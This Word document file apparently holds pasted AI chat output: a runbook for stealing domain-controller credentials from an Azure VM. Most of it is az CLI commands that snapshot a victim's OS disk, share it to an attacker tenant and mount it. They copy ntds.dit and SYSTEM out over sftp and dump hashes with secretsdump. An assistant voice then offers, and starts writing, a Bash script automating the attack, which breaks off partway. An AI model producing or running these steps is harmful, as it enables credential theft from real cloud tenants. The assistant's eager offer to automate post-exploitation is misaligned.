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BE89D" w14:textId="71C40ADA" w:rsidR="00F41B33" w:rsidRDefault="00367855">
      <w:r>
        <w:t>Azure-pentest-vm-backup-snapshot-abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46745307" w14:textId="77777777" w:rsidR="00367855" w:rsidRDefault="00367855"/>
    <w:p w14:paraId="1C2DB9B4" w14:textId="77777777" w:rsidR="00367855" w:rsidRDefault="00367855"/>
    <w:p w14:paraId="52CA39B1" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Azure - Shadow Copy / Snapshot Exfiltration Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33140DDF" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2365044C" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Exfiltrate sensitive files (e.g., ntds.dit, SYSTEM) from a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target Azure VM</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> by abusing snapshot permissions. Similar to the AWS technique, this method leverages disk snapshots and volume mounting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75629ABE" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r>
        <w:pict w14:anchorId="2FDDA4EF">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D761A2" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC9725E" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Access to </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A357D47" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Microsoft.Compute/snapshots/write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7113F3D1" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Microsoft.Compute/disks/read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257D8FD7" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Microsoft.Compute/virtualMachines/write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D03E8C5" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>CLI tools: az, secretsdump.py (Impacket), ssh, sftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A05BA36" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r>
        <w:pict w14:anchorId="650D1EAB">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C591FE" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📚</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7E9829" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authenticate with Victim Azure Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A04366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>az login --tenant &lt;victim-tenant&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5446661D" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List Target VM and Identify OS Disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC83A02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>az vm list --query "[].{name:name,resourceGroup:resourceGroup}" -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B661F8A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>az vm show --name &lt;vm-name&gt; --resource-group &lt;rg&gt; --query "storageProfile.osDisk.managedDisk.id"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D4CF8B" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Create Snapshot of the OS Disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2ADC3E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>az snapshot create \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794FFAB4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 xml:space="preserve">  --resource-group &lt;rg&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C51D6D6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 xml:space="preserve">  --source &lt;disk-id&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAB8491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 xml:space="preserve">  --name snapshot-victimvm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61098AB0" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Grant Attacker Access to Snapshot (via RBAC or export link)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461A5DE0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>az role assignment create \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C902F57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 xml:space="preserve">  --assignee &lt;attacker-object-id&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42751C0F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 xml:space="preserve">  --role "Reader" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C2443E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 xml:space="preserve">  --scope "/subscriptions/&lt;sub&gt;/resourceGroups/&lt;rg&gt;/providers/Microsoft.Compute/snapshots/snapshot-victimvm"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C0BB5E" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Switch to Attacker Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E0CB81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>az login --tenant &lt;attacker-tenant&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEC0335" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Create New Disk from Snapshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B43DEF2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>az disk create \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CCC9D3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 xml:space="preserve">  --resource-group &lt;attacker-rg&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C676A50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 xml:space="preserve">  --name mounted-disk \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76663D8D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 xml:space="preserve">  --source "/subscriptions/.../snapshot-victimvm"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5436CB" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Create Temporary VM &amp; Attach the Disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C6EB3A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>az vm create --name forensics-vm --resource-group &lt;attacker-rg&gt; --image UbuntuLTS --generate-ssh-keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023AF5FA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>az vm disk attach --vm-name forensics-vm --disk mounted-disk --new false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFB2C7F" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSH into the New VM and Mount the Disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E6D238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>ssh azureuser@&lt;public-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321B5CCD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>sudo mkdir /mnt/victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC3EFA0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>sudo mount /dev/sdc1 /mnt/victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCCB996" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Copy Target Files (e.g., from Windows domain controller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F8733A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>sudo cp /mnt/victim/Windows/NTDS/ntds.dit ~/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436959B4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>sudo cp /mnt/victim/Windows/System32/config/SYSTEM ~/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA31BDE" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>sudo chown azureuser:azureuser ~/ntds.dit ~/SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B70E671" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SFTP the Files Back to Local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3545723D" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>sftp azureuser@&lt;public-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443C6B4C" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>get ntds.dit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CED13FB" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>get SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E246811" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run SecretsDump Locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B90C86" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL -outputfile secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47223AEF" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r>
        <w:pict w14:anchorId="435E68A7">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="073BBCE4" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CA370B" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Works best on </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>domain controllers</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> where the goal is credential extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAE6E05" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Highly dependent on snapshot export/mount permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BFAB88" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Similar attack path as AWS CreateSnapshot + modify-snapshot-attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2441AA" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r>
        <w:pict w14:anchorId="17E1A30A">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF81EFB" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Would you like this turned into a modular Bash or PowerShell script for repeatable Azure post-exploitation?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C93F5A" w14:textId="77777777" w:rsidR="00367855" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54903410" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Great — here's a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>modular Bash script</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> to automate the </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Shadow Copy Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> for post-exploitation scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2A37E2" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For educational or authorized testing purposes only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAEAC6C" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r>
        <w:pict w14:anchorId="46387E57">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1119847A" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> azure_shadow_copy.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFBFC9D" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5016C0AA" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="13EA2B5A" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t># Azure Shadow Copy Attack Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198DDD43" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t># Requires: Azure CLI (`az`), SSH, SFTP, secretsdump (Impacket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726E0457" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t># Tested on Linux environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A975DF" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="5D1B8DA7" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t># === CONFIGURATION ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05162EDE" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>RESOURCE_GROUP="&lt;victim_resource_group&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F10A881" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>VM_NAME="&lt;target_vm_name&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1D3CFE" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>ATTACKER_RG="&lt;attacker_resource_group&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B9DE32" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>ATTACKER_VM_NAME="forensics-vm"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268E232B" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>SNAPSHOT_NAME="snapshot-${VM_NAME}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E7FDE4" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>DISK_NAME="cloned-disk-${VM_NAME}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2003E26E" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="50125E31" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>echo "[+] Step 1: Get OS Disk ID of target VM..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB45B89" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>DISK_ID=$(az vm show --name "$VM_NAME" --resource-group "$RESOURCE_GROUP" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01287987" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  --query "storageProfile.osDisk.managedDisk.id" -o tsv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CAF31C" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="6CDD1C16" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>echo "[+] Step 2: Create Snapshot..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798B760E" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>az snapshot create --resource-group "$RESOURCE_GROUP" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763CFBA2" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  --source "$DISK_ID" --name "$SNAPSHOT_NAME"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8E5C22" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="1C713595" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>echo "[+] Step 3: Grant Reader role to current user (if needed)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E215591" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
